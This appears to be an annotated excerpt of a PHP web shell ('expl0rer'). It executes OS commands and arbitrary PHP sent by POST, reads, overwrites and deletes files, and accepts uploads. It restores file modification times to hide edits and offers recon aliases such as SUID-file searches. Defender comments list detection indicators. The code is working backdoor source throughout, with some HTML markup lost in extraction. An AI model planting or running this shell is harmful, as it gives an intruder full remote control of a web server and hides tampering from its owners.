$v) $_POST[$k] = stripslashes($v); foreach($_SERVER as $k=>$v) $_SERVER[$k] = stripslashes($v); }
// NOTE(review): the statement above starts before this excerpt; only its tail is visible. It rewrites
// every $_POST and $_SERVER value with stripslashes().
//
// Analyst summary of the code below: it executes request-supplied OS commands and PHP source, and
// reads, overwrites, deletes, creates and uploads files, all selected by POST field names.
// No authentication or origin check is visible in this excerpt; the enclosing block opened before
// the excerpt may or may not add one.

/**
 * Run a command string through the first available PHP process-execution function.
 *
 * Order tried: exec(), shell_exec(), system(), passthru(), each gated by function_exists().
 * Output of system()/passthru() is captured with output buffering instead of being echoed.
 * Every call is @-silenced, so a failing call raises no PHP warning.
 *
 * Defender notes:
 *  - function_exists() reports false for functions listed in php.ini disable_functions, so with all
 *    four disabled this returns FALSE and the status banner prints "execute: off".
 *  - Disabling these functions does not neutralise the script: the eval() branch and the file
 *    write/delete/upload branches further down do not go through execute().
 *
 * @param mixed $c command line; handed to the chosen function unchanged (nothing is escaped here)
 * @return mixed captured output, or FALSE when none of the four functions is available
 */
function execute($c){
    if(function_exists('exec')){
        @exec($c, $out);
        return @implode("\n", $out);
    }elseif(function_exists('shell_exec')){
        $out = @shell_exec($c);
        return $out;
    }elseif(function_exists('system')){
        @ob_start();
        @system($c, $ret);
        $out = @ob_get_contents();
        @ob_end_clean();
        return $out;
    }elseif(function_exists('passthru')){
        @ob_start();
        @passthru($c, $ret);
        $out = @ob_get_contents();
        @ob_end_clean();
        return $out;
    }else{
        return FALSE;
    }
}

/**
 * Return the HTML-escaped contents of a file.
 *
 * First attempt is file(); when that yields a falsy result (failure, or an empty file) and the curl
 * extension is loaded, the same path is requested as a file:// URL and curl's echoed output is
 * captured with output buffering. If neither path applies, the literal 'Could not read file!' is returned.
 *
 * NOTE(review): whether the curl path succeeds where file() failed depends on the PHP/libcurl build
 * and configuration; that cannot be determined from this listing.
 *
 * @param mixed $f path to read; used as given, no validation in this function
 * @return string htmlspecialchars()-escaped contents or the error text
 */
function read($f){
    $str = @file($f);
    if($str){
        $out = implode('', $str);
    }elseif(function_exists('curl_version')){
        @ob_start();
        // 'file:/'.'/' concatenates to the file:// scheme prefix
        $h = @curl_init('file:/'.'/'.$f);
        @curl_exec($h);
        $out = @ob_get_contents();
        @ob_end_clean();
    }else{
        $out = 'Could not read file!';
    }
    return htmlspecialchars($out);
}

/**
 * Overwrite a file and then put its previous modification time back.
 *
 * Forensics note: the mtime is sampled before the write and re-applied with touch() afterwards, so a
 * file edited through this function keeps its old mtime. Triage by mtime alone will miss such edits;
 * compare content hashes against a known-good baseline, or use the inode change time where the
 * filesystem records one.
 *
 * @param mixed $f target path; opened in mode 'w', which truncates existing content
 * @param mixed $c new content
 * @return string status text describing the save and the timestamp restore
 */
function write($f, $c){
    // not @-silenced: a missing file yields a warning and a falsy $t
    $t = filemtime($f);
    $fp = @fopen($f, 'w');
    if($fp){
        fwrite($fp, $c);
        fclose($fp);
        $out = 'File saved.'."\n";
        if($t && touch($f, $t)){
            $out .= 'Last modification time changed.';
        }else{
            $out .= 'Could not change last modification time!';
        }
    }else{
        $out = 'Saving failed!';
    }
    return $out;
}

/**
 * Format a file's size for display as ' b', ' Kb' or ' Mb' (two decimals for Kb/Mb).
 *
 * Sizes of 1073741824 bytes and above match none of the branches and are returned as the bare
 * value from filesize(), without a unit.
 *
 * @param mixed $f path passed to filesize()
 * @return mixed formatted string, or the raw filesize() result for large files
 */
function file_size($f){
    $size = filesize($f);
    if($size < 1024) $size = $size.' b';
    elseif($size < 1048576) $size = round($size/1024*100)/100 . ' Kb';
    elseif($size < 1073741824) $size=round($size/1048576*100)/100 . ' Mb';
    return $size;
}

// Fallback only for runtimes lacking natcasesort(). It takes the array by value and returns
// sort()'s result, so the caller's array is left unsorted when this fallback is the one in use.
if(!function_exists('natcasesort')){
    function natcasesort($arr){ return sort($arr); }
}

// Working directory is request-controlled: POST field 'dir' is passed straight to chdir().
// The failure text stored in $out here is overwritten by the later `$out = '';` before any output.
if(!empty($_POST['dir'])){
    $dir = $_POST['dir'];
    if(!@chdir($dir)) $out = 'chdir() failled!';
}
$dir = getcwd();
// A ':' as the second character of the cwd (drive letter) selects the 'win' code paths.
(strlen($dir) > 1 && $dir[1] == ':') ? $os_type = 'win' : $os_type = 'nix';
if(!$os_name = @php_uname()){
    if(function_exists('posix_uname')){
        $os_name = posix_uname();
    }elseif($os_name != getenv('OS')){
        // this branch compares against getenv('OS'); the environment value itself is never stored
        $os_name = '';
    }
}
// Identity of the account PHP runs as; shown in the banner. The line break inside the string
// literal is part of the listing as extracted and is kept as-is.
if(function_exists('posix_getpwuid')){
    $data = posix_getpwuid(posix_getuid());
    $user = $data['name'].' 
uid('.$data['uid'].') gid('.$data['gid'].')';
}else{
    $user = '';
}
$safe_mode = get_cfg_var('safe_mode');
$safe_mode ? $safe = 'on' : $safe = 'off';
// Capability probe, run on every request that reaches this point: `echo ssps` is executed and any
// non-empty output marks command execution as 'on'.
// Detection note: the literal command line `echo ssps` issued by the web server / PHP account is a
// usable indicator in process-creation logs.
execute('echo ssps') ? $execute = 'on' : $execute = 'off';
$server = getenv('SERVER_SOFTWARE');
if(!$server) $server = '---';
$out = '';
$tail = '';
$aliases = '';
// Detection note: unless safe_mode is set, each page view spawns the fixed commands below as
// children of the PHP process (sysctl x4 and possibly `id`, or `ver` and `echo %username%`),
// before any operator input is handled.
if(!$safe_mode){
    if($os_type == 'nix'){
        // $os is appended to here but is neither initialised nor printed in this excerpt
        // (the banner interpolates $os_name).
        $os .= execute('sysctl -n kern.ostype');
        $os .= execute('sysctl -n kern.osrelease');
        $os .= execute('sysctl -n kernel.ostype');
        $os .= execute('sysctl -n kernel.osrelease');
        if(empty($user)) $user = execute('id');
        // label => command pairs; presumably rendered as a selection list whose chosen value comes
        // back in POST field 'alias' (the form markup is missing from this listing).
        $aliases = array(
            '' => '',
            'find suid files'=>'find / -type f -perm -04000 -ls',
            'find sgid files'=>'find / -type f -perm -02000 -ls',
            'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
            'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
            'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
            'show opened ports'=>'netstat -an | grep -i listen',
        );
    }else{
        $os_name .= execute('ver');
        $user .= execute('echo %username%');
        $aliases = array(
            '' => '',
            'show runing services' => 'net start',
            'show process list' => 'tasklist'
        );
    }
}
// Request dispatcher: the first non-empty POST field in this order decides the action.
// Fields read in this excerpt: dir, cmd, php, edit, save, efile, remove, newdir, newfile, alias,
// plus multipart file field ufile.
// Detection note: these arrive in POST bodies, which default web access logs do not record; request
// body inspection (WAF / audit logging) is needed to see them.
if(!empty($_POST['cmd'])){
    // arbitrary OS command from the request
    $out = execute($_POST['cmd']);
} elseif(!empty($_POST['php'])){
    // arbitrary PHP source from the request is evaluated in this script's scope; this path does
    // not depend on the exec-family functions being enabled
    ob_start();
    eval($_POST['php']);
    $out = ob_get_contents();
    ob_end_clean();
} elseif(!empty($_POST['edit'])){
    $file = $_POST['edit'];
    $out = read($file);
    // originally held editor form markup; only a newline survives in this listing
    $tail = '
';
} elseif(!empty($_POST['save'])){
    // path comes from 'efile', content from 'save'; write() restores the old mtime afterwards
    $out = write($_POST['efile'], $_POST['save']);
} elseif(!empty($_POST['remove'])){
    $obj = $_POST['remove'];
    @is_dir($obj) ? $res = @rmdir($obj) : $res = @unlink($obj);
    $res ? $out = 'Removed successfully' : $out = 'Removing failed!';
} elseif(!empty($_POST['newdir'])){
    @mkdir($_POST['newdir']) ? $out = 'Directory created.' : $out = 'Could not create directory!';
} elseif(!empty($_POST['newfile'])){
    @touch($_POST['newfile']) ? $out = 'File created.' : $out = 'Could not create file!';
} elseif(!empty($_POST['alias'])){
    // the value is executed as sent; nothing here checks it against the $aliases table
    $out = execute($_POST['alias']);
} elseif(!empty($_FILES['ufile']['tmp_name'])){
    // upload is copied into the current directory under the client-supplied file name, unmodified
    // (chr(47) is '/'); no extension or content check is applied
    if(!is_uploaded_file($_FILES['ufile']['tmp_name']) || @!copy($_FILES['ufile']['tmp_name'],$dir.chr(47).$_FILES['ufile']['name'])) $out = 'Could not upload file';
    else $out = 'Uploaded successfully.';
}
// NOTE(review): from here the heredoc markup was lost when this listing was extracted; the line
// below is stylesheet residue and is kept verbatim.
print<< table {font:9pt Tahoma;border-color:white} input,select,file {background-color:#eeeeee} textarea {background-color:#f2f2f2}
here; if(!$safe_mode) print<< here; print<< here; if($aliases){ print<< here; } print<<
cmd
php
actions edit remove new_dir new_file
aliases
dir
upload
OS: {$os_name}
User: {$user}
Server: {$server}
safe_mode: {$safe} execute: {$execute} max_execution_time: {$limit}
~:(expl0rer):~
here;
// NOTE(review): `here;` above terminates a heredoc whose HTML body is missing from this listing.
// The string literals below also lost their markup, so what remains inside them is mostly empty
// strings and line breaks; they are kept exactly as extracted.
//
// Directory browser: lists the current working directory and colour-codes each entry by what the
// PHP account can do with it (red = writable, blue = readable, black = neither).
if($dp = @openDir($dir)){
    $cObj = readDir($dp);
    // loop ends on the first falsy value from readDir(): end of directory, or an entry named "0"
    while($cObj){
        // entry names are tested relative to the cwd
        if(@is_dir($cObj)) $theDirs[] = $cObj;
        elseif(@is_file($cObj)) $theFiles[] = $cObj;
        $cObj = readDir($dp);
    }
    closedir($dp);
}
if(!empty($theDirs)){
    natcasesort($theDirs);
    if($os_type == 'nix'){
        // passive permission checks only
        foreach($theDirs as $cDir){
            $color='black';
            if(is_writeable($cDir)){
                $color='red';
            }elseif(is_readable($cDir)){
                $color='blue';
            }
            print "<".$cDir.">
";
        }
    }else{
        // Active write probe: a file named .ssps_tmp is created in every listed directory and then
        // deleted. The unlink() result is not checked.
        // Forensics note: a leftover .ssps_tmp file, or create/delete events for that name under
        // the web server account, indicates this listing code ran against the directory.
        foreach($theDirs as $cDir){
            $tmp = $cDir.'/.ssps_tmp';
            if(@touch($tmp)){
                $color='red';
                unlink($tmp);
            }elseif(opendir($cDir)){
                closedir();
                $color='blue';
            }else{
                $color='black';
            }
            print "<".$cDir.">
";
        }
    }
}
// no directory entries could be collected: the page reports the configured open_basedir value
else print '
open_basedir restriction in effect. Allowed path is '.get_cfg_var('open_basedir');
print '
';
if(!empty($theFiles)){
    natcasesort($theFiles);
    print '';
    foreach($theFiles as $cFile){
        $size = file_size($cFile);
        // Writability is tested by opening each file in append mode, then read mode as a fallback.
        // Detection note: one page view therefore opens every file in the directory for writing
        // under the web server account, which is visible to file-access auditing.
        if($fp = @fopen($cFile, 'a')) $color = 'red';
        elseif($fp = @fopen($cFile, 'r')) $color='blue';
        else $color = 'black';
        @fclose($fp);
        print '';
    }
    // NOTE(review): in this listing the name/size output sits after the loop; that placement is
    // probably an artifact of the stripped markup. Names are concatenated without HTML escaping.
    print '
'.$cFile.''.$size.'
';
}
print<<
~:(results):~ {$tail}
here; die; } ?>